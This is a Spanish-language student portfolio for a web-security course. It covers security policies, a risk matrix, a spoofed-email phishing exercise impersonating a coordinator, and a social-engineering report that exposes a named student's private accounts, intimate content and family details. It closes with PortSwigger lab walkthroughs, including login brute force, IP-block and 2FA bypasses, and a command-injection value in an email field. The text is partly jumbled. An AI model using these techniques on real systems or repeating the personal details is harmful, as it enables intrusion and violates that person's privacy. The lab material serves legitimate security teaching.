Descarga la aplicación para disfrutar aún más
Vista previa del material en texto
Instituto Tecnológico Superior Progreso PORTAFOLIO DE EVIDENCIAS NOMBRE DEL ESTUDIANTE WILBERTH RAFAEL MADERA POOT MATRICULA 04200014 CARRERA INGENIERIA EN SISTEMAS COMPUTACIONALES CORREO ELECTRONICO Wilberth.rafael.madera.poot@gmail.com ASIGNATURA Seguridad en la web SEMESTRE Séptimo DOCENTE Dr. Edgar Alejandro Sagundo Duarte CORREO ELECTRONICO edgar.sd@progreso.tecnm.mx mailto:Wilberth.rafael.madera.poot@gmail.com mailto:edgar.sd@progreso.tecnm.mx Instituto Tecnológico Superior Progreso I N D I C E 1. REGLAS DE COMPORTAMIENTO DEL GRUPO 2. EVIDENCIAS ORGANIZADAS POR UNIDAD 3. COEVALUACION FINAL 4. AUTOEVALUACION FINAL 5. COMENTARIOS FINALES UNIDAD 1 1 Instituto Tecnológico Superior Progreso Instituto Tecnológico Superior Progreso CARRERA: Ingeniería en Sistemas Computacionales MATERIA: Seguridad en la Web Actividad: Las Políticas de Seguridad Informática. Docente: Dr. Edgar Alejandro Sagundo duarte Alumno: Wilberth Rafael Madera Poot SEMESTRE: 7mo 2 ¿QUÉ SON LAS POLÍTICAS DE SEGURIDAD INFORMÁTICA? QUÉ SON LAS POLÍTICAS DE SEGURIDAD INFORMÁTICAS TIPOS DE POLÍTICAS DE SEGURIDAD INFORMÁTICA 1. POLÍTICAS DE BUENAS PRÁCTICAS INFORMÁTICAS Instituto Tecnológico Superior Progreso Conduce a la empresa a ver cómo sus datos crecen y sus procesos se vuelven más complejos, aumentando los riesgos informáticos las políticas de seguridad informática tienen como objetivo hacer un buen uso de los activos informáticos en cualquier empresa. Gracias a éstas, sabemos cómo actuar con seguridad ante un ciberataque o un problema informático que pueda provocar datos en datos de terceros. La política de seguridad informática, nos referimos a un documento en el que se plasman las normas, reglas y directrices de una organización para proteger los datos de la empresa y reducir los riesgos ligados al uso de la tecnología en la empresa las políticas informáticas van destinadas a proteger la confidencialidad y privacidad de los datos, así como la disponibilidad de los sistemas y equipos informáticos pertenecientes a la empresa, de manera que ésta pueda seguir desarrollando sus actividades de manera normal no sólo los miembros del Departamento de Informática, si lo hay, deben conocer las políticas de seguridad. Todos los miembros de la plantilla u organización deben ser conscientes de que los problemas de seguridad informática pueden afectar a las personas de su alrededor. Por eso es imprescindible cumplir con unas reglas que acompañen las acciones de cada empleado y departamento. podemos observar que existen dos tipos de protocolos. Son aquellas que están orientadas a definir qué es lo que hay que hacer. Es decir, aquellas acciones que todos los empleados deben realizar por razones de seguridad informática. Por ejemplo, introducir la contraseña en el ordenador, entrar a la red informática virtual de la empresa, mantener limpios los ordenadores 3 2. POLÍTICAS DE RIESGOS INFORMÁTICOS IMPORTANCIA DE TENER UNA POLÍTICA DE SEGURIDAD INFORMÁTICA EN TU EMPRESA LAS POLÍTICAS DE SEGURIDAD DEBEN TENER UNAS CARACTERÍSTICAS ESPECÍFICAS. Instituto Tecnológico Superior Progreso o cualquier acción positiva de mantenimiento que deban seguir los empleados para darle un buen mantenimiento al hardware y el software. La política de riesgos informáticos, por su parte, se enfoca en lo que no se debe hacer o debemos evitar a toda costa. Por ejemplo, compartir las contraseñas de la empresa con terceros ajenos a la compañía. O descargar programas desde páginas web ajenas al fabricante y sin hacer un análisis de virus. Hacer click en enlaces dudosos que puedan llegar a través de las redes sociales. En definitiva, todas las malas prácticas que pueden dar lugar a problemas para la privacidad, confidencialidad e integridad de los datos. Es de gran importancia que todas las empresas puedan disponer de una política de seguridad. De no hacerlo, los miembros de la organización actuarán por su cuenta y riesgo en el mantenimiento de los sistemas de hardware y software de la empresa. Debemos tener en cuenta que la informática es un activo de la empresa, que puede influir en su rendimiento y crecimiento económico. Si nuestros sistemas no tienen la protección adecuada, estaremos asumiendo enormes riesgos. ENCONTRAMOS QUE DEBEN SER: • Concretas, es decir, tienen que poder implementarse a través de procedimientos, reglas y pautas claras. • Claras. No pueden ser ambiguas, sino que todo el mundo debe entender, de la misma forma, las responsabilidades y obligaciones que tienen los 4 ¿POR QUÉ SON IMPORTANTES LAS POLÍTICAS DE SEGURIDAD INFORMÁTICA? ALGUNOS EJEMPLOS DE POLÍTICAS DE SEGURIDAD INFORMÁTICA Instituto Tecnológico Superior Progreso distintos tipos de usuario (empleados, administradores, proveedores, colaboradores, dirección…) para garantizar la seguridad informática de la empresa. • Obligatorias. Toda la empresa debe cumplirlas sin excepciones. Para garantizar esto, es importante poner medidas o herramientas de seguridad que faciliten este cumplimiento. LAS POLÍTICAS DE SEGURIDAD INFORMÁTICA TIENEN COMO OBJETIVO VELAR POR: • Privacidad de la información. • Integridad de los datos. • Disponibilidad de los datos e información 24/7 los 365 días del año. Además, estas políticas, tienen la finalidad de guiar a los empleados, para que sepan en todo momento cómo actuar y cómo protegerse. La concienciación y formación es el primer paso para evitar ciberataques causados por errores de factor humano, que son los más comunes y frecuentes. Las políticas de seguridad informática pueden estar adaptadas a los diferentes departamentos que conforman la empresa, o al tipo de personal que esta tiene. • Privacidad en el uso de herramientas o software de trabajo. 5 CONCLUSIÓN REFERENCIAS Instituto Tecnológico Superior Progreso • Pautas para seguir para la compra de nuevas tecnologías o la contratación de servicios de software. • Accesibilidad de los usuarios: Definición de los derechos y privilegios para una correcta gestión y control de la información. • Responsabilidad de cada departamento y usuario dentro de la empresa en la manipulación de información. • Pasos para seguir ante un ciberataque: ¿quién es el responsable de notificar y tomar las decisiones de actuación? • Cómo actuar en caso de brecha de seguridad. • Soluciones de ciberseguridad básicas a implementar. • Soluciones de ciberseguridad avanzadas a implementar. La política de seguridad de la información es el documento donde se definen las medidas que tu empresa tomará para proteger la información. Debes saber que aquí se describen los lineamientos generales de cada medida y, en esta instancia, no es necesario profundizar en el detalle de cada medida, ya que para eso crearemos otros documentos específicos con el paso a paso para llevar a cabo cada medida. Walter, V. V. (s. f.). POLITICAS y SEGURIDAD DE LA INFORMACION. http://www.scielo.org.bo/scielo.php?script=sci_arttext&pid=S2071- 081X2008000100008 Mifsud, E. (s. f.). MONOGRÁFICO: Introducción a la seguridad informática - Políticas de seguridad | Observatorio Tecnológico. http://recursostic.educacion.es/observatorio/web/es/component/content/article/104 0-introduccion-a-la-seguridad-informatica?start=4 http://www.scielo.org.bo/scielo.php?script=sci_arttext&pid=S2071- http://recursostic.educacion.es/observatorio/web/es/component/content/article/104 6 Instituto Tecnológico Superior ProgresoPolíticas de seguridad informática para las necesidades del usuario actual | Revista .Seguridad. (s. f.). https://revista.seguridad.unam.mx/numero27/politicas-de-seguridad- informatica-necesidades-usuario-actual Pérez, A. (2021, 14 septiembre). Políticas de seguridad informática, ¿qué pueden contemplar? OBS Business School. https://www.obsbusiness.school/blog/politicas-de-seguridad-informatica- que-pueden-contemplar http://www.obsbusiness.school/blog/politicas-de-seguridad-informatica- 1 Instituto Tecnológico Superior Progreso Instituto Tecnológico Superior Progreso CARRERA: Ingeniería en Sistemas Computacionales MATERIA: Seguridad Web Actividad: Actividad 2 Test Docente: Dr. Edgar Alejandro Sagundo Duarte Alumno: Wilberth Rafael Madera Poot SEMESTRE: 7mo 2 Instituto Tecnológico Superior Progreso Test Ciberseguridad 3 Instituto Tecnológico Superior Progreso 4 Instituto Tecnológico Superior Progreso 5 Instituto Tecnológico Superior Progreso 6 Instituto Tecnológico Superior Progreso phishing 7 Instituto Tecnológico Superior Progreso 8 Instituto Tecnológico Superior Progreso 9 Instituto Tecnológico Superior Progreso 10 Instituto Tecnológico Superior Progreso 11 Instituto Tecnológico Superior Progreso seguridad física 12 Instituto Tecnológico Superior Progreso 13 Instituto Tecnológico Superior Progreso UNIDAD 2 INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 2 Taller de redes Phishing Objetivo Desarrollar un correo en phising cumpliendo con las condiciones para ello. Nombre de los integrantes de equipo Matrícula Juan Alejandro Vivas Cetz 04200024 Wilberth Rafael Madera Poot 04200014 Estado del arte En el ámbito del phishing, al igual que en otros campos de ciberseguridad, está en constante evolución debido a la sofisticación creciente de los atacantes y las tecnologías de detección y prevención. Descripción 1. Con base a la explicación del docente, crear un phishing y enviarlo al correo edgar.sd@progreso.tecnm.mx 2. Deberá incluir los siguientes puntos y lo resolverá por medio del siguiente link https://emkei.cz/ • Respeto a la autoridad • Voluntad de ayudar • Ofrecer algo a cambio • Sentido de urgencia 3. A completar el formato de práctica y colocar en el desarrollo la captura de lo que escribió y especificar para que tipo de personas fue su objetivo. 4. Entregar este formato por integrante mailto:edgar.sd@progreso.tecnm.mx Desarrollo Para poder realizar esta práctica nos dieron los puntos mas importantes para poder realizarlo con esta página web llamada emkei es una herramienta en línea que permite enviar correos electrónicos falsos y simular que somos esa persona para poder usarlo en un entorno seguro para poder evitar alguna situación desagradable y con todo el debido respeto Puede utilizarse con fines de prueba y desarrollo, pero también podría utilizarse de manera inapropiada para el phishing o el envío de correos electrónicos engañosos. La voluntad de ayudar es que los atacantes de phishing a menudo se hacen pasar por personas amigables o representantes de empresas legítimas que están dispuestos a ayudar a la víctima. Pueden ofrecer asistencia con problemas supuestamente urgentes, como la "bloqueo" de una cuenta o la necesidad de verificar la información de la cuenta para esto podemos ofrecer algo a cambio que los estafadores de phishing a menudo prometen recompensas o beneficios para motivar a las personas a tomar medidas impulsivas. Pueden ofrecer premios falsos, descuentos exclusivos o la posibilidad de evitar problemas futuros a cambio de que la víctima proporcione información personal o realice ciertas acciones ya que el sentido de urgencia de unos de los elementos clave en las estafas de phishing es crear un sentido de urgencia en la víctima. Los atacantes pueden afirmar que hay una amenaza inminente o que es necesario tomar medidas de inmediato para evitar consecuencias graves. Esta urgencia a menudo impide que la víctima tome el tiempo necesario para verificar la autenticidad de la solicitud. Para esta solicitud nos hicimos pasar por el coordinador de la carrera para poder hacer dando algunas indicaciones para poder hacer que caiga nuestra víctima. En esta primera imagen agregamos las direcciones de correo electrónico para poder suplantar la identidad de la persona que está más cerca de para poder hacer que nuestra victima caiga también le agregamos el nombre del mensaje para que la victima ve que es un correo importante y agregamos una copia para nuestro correo para comprobar si nos llega En las segunda imagen agregamos la información que deseamos agregarle a nuestra victima para poder hacer que caiga y poder robar información Y por último en esta imagen al realizarlo lo enviamos y nos manda un mensaje que fue enviado con éxito ahora esperemos la información de nuestra víctimas. Conclusiones personales Wilberth Rafael Madera Poot: En esta practica aprendimos hacer de forma automática un correo malicioso con una pagina web para esto tuvimos algunos problemas ya que al hacer nuestra pruebas no llegaba el correo ya que ay algunos parámetro en la seguridad del correo que no permite que llegue ya que este es un método de seguridad que usan para poder evitar que se puede propagar algún virus para esto probamos con una pagina de correos temporales y poder saber si llega Juan Alejandro Vivas Cetz: Con esta práctica logré usar conocimientos para elaborar un phishing por medio de una página que permite elaborarlo automático, surgió algunos problemas ya que es primera vez que lo realizamos ya que hicimos varias pruebas hasta que nos llego pero no me permitió abrirlo ya que detectaba que era un correo malicioso Conclusión en equipo En esta practica tuvimos algunas complicaciones ya que en desconocíamos un poco sobre la pagina para poder realizar esta actividad para esto realizamos distintas pruebas para poder saber cómo funcionan ya que también tenemos las opciones HTML para poder recrear una pagina web pero la mejor opción para realizar esta fue hacer un texto plano para que se pudiera visualizar ya que algunos correos como Gmail al momento de enviarlo nunca llega y probamos destinitos correo para poder realizar esta practica Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la Se entregó parcialmente Se entregó sin funcionar práctica sin errores funcionando la práctica Tiempo y forma Se entregó en tiempo y con Se entregó en tiempo o con No se entregó el formato adecuado el formato adecuado Trabajo en equipo Todos los integrantes Casi todos los integrantes No trabajaron en equipo trabajaron en equipo trabajaron en equipo Fotografías o vídeo Muestra el funcionamiento Muestra parcialmente el No hay vídeo o no muestra (evidencia) completo de la práctica funcionamiento de la el funcionamiento de la desde el inicio, desarrollo y práctica en su reporte práctica en su reporte final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales de cada personales de cada personales de cada integrante del equipo de lo integrante del equipo de lo integrante del equipo de lo que hizo y la conclusión que hizo o la conclusiónque hizo ni la conclusión grupal es la misma de todo grupal es la misma de todo grupal es la misma de todo el grupo el grupo el grupo Examen de Unidad 1 Seguridad en la web Equipo #4 (Kevin A. Couoh Pérez, Geovanny A. Flores Montero & Wilberth R. Madera Poot) 1. Estructura del Centro de Cómputo 2 MODELO DE UN PROCESO DE GESTIÓN DE RIESGO DE LA SEGURIDAD DE LA INFORMACIÓN DEL CENTRO DE CÓMPUTO 2 Cláusula / Dominio Entregable Establecimiento del Contexto (EC) Matriz de Riesgo Inicial (MRi) de los activos Valoración del Riesgo (VR) Matriz de Riesgo Inicial Valorada MODELO DE UN PROCESO DE GESTIÓN DE RIESGO DE LA SEGURIDAD DE LA INFORMACIÓN DEL CENTRO DE CÓMPUTO 2 Cláusula / Dominio Entregable Tratamiento del Riesgo (TR) Controles, Plan de Acción de TR Aceptación del Riesgo (AR) Riesgos residuales, Criterio de Aceptación Comunicación del Riesgo (CR) Plan de Comunicación desarrollado por … Monitoreo y Revisión del Riesgo (MRR) Matriz de Riesgo Final (MRf) MATRIZ DE ASIGNACIÓN DE RESPONSABILIDADES ORGANIZACIÓN CENTRO DE CÓMPUTO 2, NIVEL 0 Activo Responsable Rinde cuentas Consultado Informado Firewall MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP (Arq. María Del Carmen Sánchez González) Dirección Académica del ITSP (Lic. María Del Carmen Ordaz Martínez) Balanceador MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP Dirección Académica del ITSP Motor de base de datos MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP Dirección Académica del ITSP Monitoreo de la salud de MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Subdirección Académica del ITSP Dirección Académica del ITSP equipos y servicios Carrillo García Capa web (servidor de aplicaciones) MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP Dirección Académica del ITSP Sistemas de almacenamiento MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Sistemas de respaldo MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP Dirección Académica del ITSP Equipos de comunicación MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP Dirección Académica del ITSP Capa de servidores físicos MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Capa de servidores virtuales Data center MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Seguridad informática MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Seguridad de la información MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP MATRIZ DE ASIGNACIÓN DE RESPONSABILIDADES ORGANIZACIÓN CENTRO DE CÓMPUTO 2, NIVEL 1 Activo Actividades Responsable Rinde cuentas Consultado Informado Firewall Monitorea y MTI. José Mtro. Subdirección Dirección controla el tráfico Emiliano José Académica del ITSP Académica de red entrante y Tuyin Francisco (Arq. María Del Carmen del ITSP saliente Anguas Carrillo Sánchez González) (Lic. María García Del Carmen Ordaz Martínez) Balanceador Distribuye la MTI. José Mtro. Subdirección Dirección carga del tráfico Emiliano José Académica del ITSP Académica entre los Tuyin Francisco del ITSP servidores Anguas Carrillo García Motor de base Instalar y MTI. José Mtro. Subdirección Dirección de datos respaldar la Emiliano José Académica del ITSP Académica información, Tuyin Francisco del ITSP monitorear su Anguas Carrillo funcionamiento García Monitoreo de la Se revisa el MTI. José Mtro. Subdirección Dirección salud de rendimiento Emiliano José Académica del ITSP Académica equipos y general del Tuyin Francisco del ITSP servicios equipo Anguas Carrillo semanalmente, García se actualiza y se respalda la información Capa web Dos servicios de MTI. José Mtro. Subdirección Dirección (servidor de aplicaciones; Emiliano José Académica del ITSP Académica aplicaciones) Control Tuyin Francisco del ITSP documental y Anguas Carrillo consultas del García sistema (SIE), además del dominio de la escuela que se tiene en un hosting externo Sistemas de almacenamiento Procurar que siempre cuenten con más almacenamiento, que estén configurados para espejeo (espejo), se tiene habilitado un NAS para solicitar/consultar y respaldar la información MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Sistemas de respaldo Los respaldos se realizan cada 3 días o semanalmente, incluso mensualmente dependiendo del movimiento, se programan con un sistema gratuito MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP Dirección Académica del ITSP Equipos de comunicación Routers, firewall, módems, switch principal, switch de acceso y switch de distribución MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García Subdirección Académica del ITSP Dirección Académica del ITSP Capa de servidores físicos El site dispone de algunos servidores físicos MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Capa de servidores virtuales Data center No se cuenta con un Data Center. El site cuenta con cuatro servidores virtuales, pero generalmente tres están activos MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Dirección Académica del ITSP Comunicaciones (STIC) Seguridad informática No se cuenta con seguridad de informática MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP Seguridad de la información Se aplican políticas básicas de usuarios, contraseñas, accesos físicos en los equipos MTI. José Emiliano Tuyin Anguas Mtro. José Francisco Carrillo García • Subdirección Académica del ITSP • Subsecretaría de Tecnología de la Información y Comunicaciones (STIC) Dirección Académica del ITSP ANOTACIONES: En los apartados en donde aparece la Subsecretaría de Tecnología de la Información y Comunicaciones (STIC), esto se debe, ya que en el caso de que se necesite realizar una mejora/actualización, por ejemplo;a los servidores físicos, subdirección académica tiene que solicitarlo a STIC. Otro ejemplo es; en el caso de la seguridad de la información es solamente informar a STIC, las políticas de seguridad que se aplican. Matriz Inicial de riesgo Clasificación básica de Activos de información 1 Menor 2 Moderado 3 Mayor 4 Significante 5 Muy significante Clasificación básica de la información 1 Confidencial 2 Uso interno 3 Pública Clasificación básica probabilidad de amenaza 1 Menor 2 Considerada 3 Moderado 4 Alta 5 Muy Alta Clasificación básica de valor de incidente 1 Muy Bajo 2 Bajo 3 Intermedio 4 Alto 5 Muy Alto Matriz de riesgo Entidad Tecnológico Nacional de México Campus Progreso Fecha 22/09/2023 Caso Sistema Informático del Centro de Cómputo 2 https://www.progreso.tecnm.mx/ MATRIZ DE RIESGO INICIAL (MRi) Activos Hardware, Software y Conectividad Fuentes Modelo de proceso de gestión de riesgo de la seguridad de la información del ITSP Ambiente Tipo de activo Detalle de activo Valor de activo Probabilidad de amenaza Valor de incidente Riesgo Público Hardware 22 computadoras para uso de estudiantes de diferentes modelos 5 3 5 • Al ser de uso público, cualquier estudiante podría intentar descargar y/o instalar algún tipo de software malicioso afectando los equipos. • Muchos estudiantes no tienen la cultura informática de cerrar sus cuentas cuando usen alguna computadora o también utilizan el guardado automático del navegador para no tener que escribir sus contraseñas, esto es un punto muy vulnerable, ya que le están regalando el acceso a sus cuentas a https://www.progreso.tecnm.mx/ cualquier persona que acceda a esa misma computadora • Los equipos cuentan con el SO de Windows en diferentes versiones; 11, 10 y 8.1. Los equipos que cuenten con una versión antigua del SO tienen más vulnerabilidades, aunque de manera general todo SO es muy vulnerable Confidencial Hardware, software y conectividad Servidores basados en procesador Xeon, 32 GB de RAM, 4 discos duros de 2TB 5 5 5 • Tanto los servidores físicos como virtuales serían el objetivo de algún ciber- atacante, en ellos se aloja el SIE, donde se encuentran la información de los estudiantes, por ejemplo; las calificaciones Confidencial Software Sistemas de respaldo en software gratuito 4 4 4 • Los respaldos se generalmente se realizan cada tres días, por lo que si se perdiera la información en el 2do. O 1er. Día no se dispondría de una copia muy actualizada. • El software que se utiliza para respaldar la información es gratuito, por lo que carece de funciones avanzadas que algún software de paga si ofrezca Ingeniería social Matriz de Información Critica 1 Insignificante 2 Básica 3 Moderado 4 Muy significante 5 Criticado Matriz Objetivo Objetivo Erick Mateo Canul Pérez Técnicas Phishing Matriz de Información Critica 5 Erick Mateo Canul Pérez es un estudiante de ITSP de la carrera de Administración el cual pudimos obtener toda su información extrayéndolo de un dispositivo el cual tenía toda la información de esta persona el cual su contenido que tenia era critico ya que encontraban información muy sensible como contenido fotos/videos subidas de tono también encontramos que tiene correos asociados a la empresa de videojuegos de epicgame y steam también encontramos que tiene cuentas de banco como también pudimos acceder a su correo personal como también el correo institucional también pudimos acceder a su Facebook también en su correo encontramos que tiene guardado sus contraseñas de sus aplicaciones como Amazon epigame ,steam ,etc. también sabemos donde vive el actualmente vive en progreso también es un aficionado a los gatos y perros también le gusta hacer postre con su novia y su novia se llama Katy también se pudo obtener que también tiene familiares que viven en el puerto de chelem también al parecer su familia al parecer tiene una pizzería Evidencias Plataforma de institucional Contraseñas guardadas Correo Personal Fotos y conversaciones que se guardan automáticamente Cuenta de Facebook que se pudo acceder con el código de verificación de dos pasos Cuenta de juegos de epicgame juego que fueron adquiridos Nota todos estos fue mostrado para fines didáctico ningún materia se nos quedo al realizar esta practica ya que por motivo de privacidad no serán mostrados y por lo tanto esta es una practica supervisada todos los datos de la cuenta fueron cerradas y borradas de ese equipo. UNIDAD 3 INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 2 Taller de redes Puntos débiles en seguridad web Objetivo Conocer y comprender el Modelo de Seguridad de J2EE. Nombre del alumno Matrícula Wilberth Rafael Madera Poot 04200014 Estado del arte Se están utilizando para mejorar la detección de amenazas y la respuesta automatizada. Los algoritmos pueden analizar patrones y comportamientos para identificar actividades sospechosas. Descripción 1. Con base a la explicación del docente, el alumno se registrará y entrará al siguiente link: https://portswigger.net/web-security 2. Seleccionará el apartado de Academia y realizará los laboratorios de los apartados de • Autenticación (14 laboratorios) • Comandos de inyección (5 laboratorios) 3. A completar el formato de práctica y colocar en el desarrollo la captura de los laboratorios resueltos, colocar en las imágenes lo aprendido en ese laboratorio. 4. Entregar este formato por alumno Desarrollo usando la función Intruder, realiza un ataque de fuerza bruta en la página de inicio de sesión. Configura Burp Intruder con un nombre de usuario no válido como carga útil y deja la contraseña estática. Utiliza el tipo de ataque Sniper y carga útil Lista simple con una lista de nombres de usuario candidatos. Inicia el ataque y verifica los resultados en la pestaña Resultados, prestando atención a la columna de Longitud para encontrar posibles nombres de usuario válidos. envía credenciales inválidas a través de la solicitud POST/login y usa Burp Intruder. Marca el campo de nombre de usuario como posición de carga útil y elige Lista simple con una lista de nombres de usuario. En la pestaña Configuración, configura Grep - Extraer para identificar el mensaje de error "Nombre de usuario o contraseña no válidos". Inicia el ataque y, al finalizar, examina la columna de mensajes de error extraídos para identificar posibles diferencias sutiles que podrían indicar un nombre de usuario válido. en funcionamiento, realiza pruebas de inicio de sesión con credenciales no válidas y envía la solicitud POST/iniciar sesión a Burp Repeater. Utiliza diferentes nombres de usuario y contraseñas, teniendo en cuenta el riesgo de bloqueo de IP por intentos fallidos. Descubre que el encabezado X- Forwarded-For es compatible y permite falsificar la dirección IP para eludir la protección basada en IP.. en ejecución, investiga la página de inicio de sesión y nota que tu IP se bloquea después de tres intentos fallidos consecutivos. Sin embargo, puedes restablecer el contador iniciando sesión en tu propia cuenta antes de alcanzar este límite. Ingresa credenciales incorrectas y envía la solicitud POST/iniciar sesión a Burp Intruder. Configura un ataque de horquilla con posicionesde carga útil en los parámetros de nombre de usuario y contraseña. En la pestaña Grupo de recursos, añade el ataque a un grupo con el máximo de solicitudes simultáneas establecido en 1 para enviar las solicitudes en el orden correcto. en marcha, explora la página de inicio de sesión y envía credenciales inválidas. Utiliza Burp Intruder y selecciona el tipo de ataque Bomba de racimo. Agrega una posición de carga útil al parámetro de nombre de usuario y otra posición de carga útil en blanco al final del cuerpo de la solicitud. La solicitud resultante se verá así: nombre de usuario=§nombre de usuario-inválido§&contraseña=ejemplo§§ En la pestaña Cargas útiles, añade la lista de nombres de usuario al primer conjunto de cargas útiles. Para el segundo conjunto, elige el tipo de cargas útiles nulas y genera 5 cargas útiles, lo que efectivamente repite cada nombre de usuario 5 veces. Inicia el ataque. Con Burp en funcionamiento, examina la página de inicio de sesión y nota que la solicitud POST /login envía las credenciales en formato JSON. Envía esta solicitud a Burp Repetidor. En Burp Repeater, sustituye el valor de cadena única de la contraseña con una matriz de cadenas que contenga todas las contraseñas candidatas inicia sesión en tu cuenta, recibe el código de verificación 2FA por correo electrónico y accede a tus correos haciendo clic en el botón Cliente de correo electrónico. Anota la URL en la página de tu cuenta. Cierra sesión. Luego, inicia sesión con las credenciales de la víctima. Durante la solicitud del código de verificación, modifica manualmente la URL para navegar a /mi-cuenta. En Burp Intruder, configura el parámetro de verificación como "carlos" y agrega una posición de carga útil al parámetro mfa-code. Realiza un ataque de fuerza bruta en el código de verificación. Carga la respuesta 302 en el navegador para completar el proceso. Con Burp en funcionamiento, inicia sesión como Carlos y explora el proceso de verificación 2FA. Ten en cuenta que al ingresar el código incorrecto dos veces, tu sesión se cerrará. Utiliza las funciones de manejo de sesiones de Burp para volver a iniciar sesión automáticamente antes de cada solicitud. En Burp, ve a Opciones de proyecto > Sesiones. En el panel Reglas de manejo de sesiones, haz clic en Agregar, lo que abre el editor de reglas de manejo de sesiones. En el cuadro de diálogo del editor de reglas, ve a la pestaña Alcance y selecciona Incluir todas las URL en el alcance de la URL. Regresa a la pestaña Detalles y en Acciones de regla, haz clic en Agregar Ejecutar una macro. En Procesamiento de carga útil, agrega las reglas necesarias en orden para manipular la carga útil según tus necesidades. Estas reglas se aplicarán secuencialmente. cada carga útil antes de enviar la solicitud. explora la función de restablecimiento de contraseña que envía un enlace con un token único por correo electrónico. En Burp Repetir, envía la solicitud POST /olvidé mi contraseña, observando que el encabezado X-Forwarded-Host es compatible y puede utilizarse para apuntar el enlace de restablecimiento a un dominio arbitrario. Utilice Burp Suite para interceptar y modificar la solicitud que envía comentarios. Modifique el parámetro de correo electrónico, cambiándolo a: correo electrónico=x||ping+-c+10+127.0.0.1|| Observe que la respuesta tarda 10 segundos en regresar. Emplea Burp Suite para interceptar y modificar la solicitud de comentarios. Cambia el parámetro de correo electrónico al hacer Haz clic derecho y selecciona "Insertar carga útil de Colaborador" para añadir un subdominio de Burp Colaborador en la ubicación indicada del parámetro de correo electrónico modificado. Conclusiones personales En esta actividad aprendimos a utilizar diferentes campos de la ciber seguridad ya que esto nos ayuda a poder penetrar diferentes servicios como también saber la manera de defender los empresas para poder ayudar en la protección delos dato para esto son la diferente prácticas que podemos encontrar para poder aprender de este tema ya que también en esta actividad por la falta de tiempo no se pudo completar peros se realizaron algunas de esta para practicar de manera que se pueda entender al momento de hacer un hackeo. Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la práctica sin errores Se entregó parcialmente funcionando la práctica Se entregó sin funcionar Tiempo y forma Se entregó en tiempo y con el formato adecuado Se entregó en tiempo o con el formato adecuado No se entregó Contenido Tiene todos los apartados correctamente escritos Casi todos los apartados están correctamente escritos No tiene todos los apartados correctamente escritos Fotografías o vídeo Muestra el Muestra parcialmente No hay vídeo o no Usa Burp Suite Professional para interceptar y modificar la solicitud de comentarios. Dirígete a la pestaña Colaborador y haz clic en "Copiar al portapapeles" para copiar una carga útil única de Burp Colaborador. Modifica el parámetro de correo electrónico, sustituyéndolo por algo similar a lo siguiente, pero inserta tu subdominio Burp Colaborador donde se indica: Regresa a la pestaña Colaborador y haz clic en "Encuestar ahora". Observa las interacciones de DNS iniciadas por la aplicación como resultado de tu carga útil. Si no ves ninguna interacción, espera unos segundos y vuelve a intentarlo, ya que la ejecución del comando del lado del servidor es asincrónica. (evidencia) funcionamiento el funcionamiento de la muestra el completo de la práctica práctica en su reporte funcionamiento de la desde el inicio, práctica en su reporte desarrollo y final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales de cada personales de cada personales de cada integrante del equipo integrante del equipo integrante del equipo de lo que hizo y la de lo que hizo o la de lo que hizo ni la conclusión grupal es la conclusión grupal es la conclusión grupal es la misma de todo el grupo misma de todo el grupo misma de todo el grupo Ortografía No tiene ninguna falta ortográfica Tiene algunas faltas ortográfica, cada una se le descuenta 1 punto Todo el documento esta lleno de errores ortográficos. Objetivo: En esta práctica realizaremos pruebas de pentesting ya que esta es una practica que consiste en Desarrollo INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO 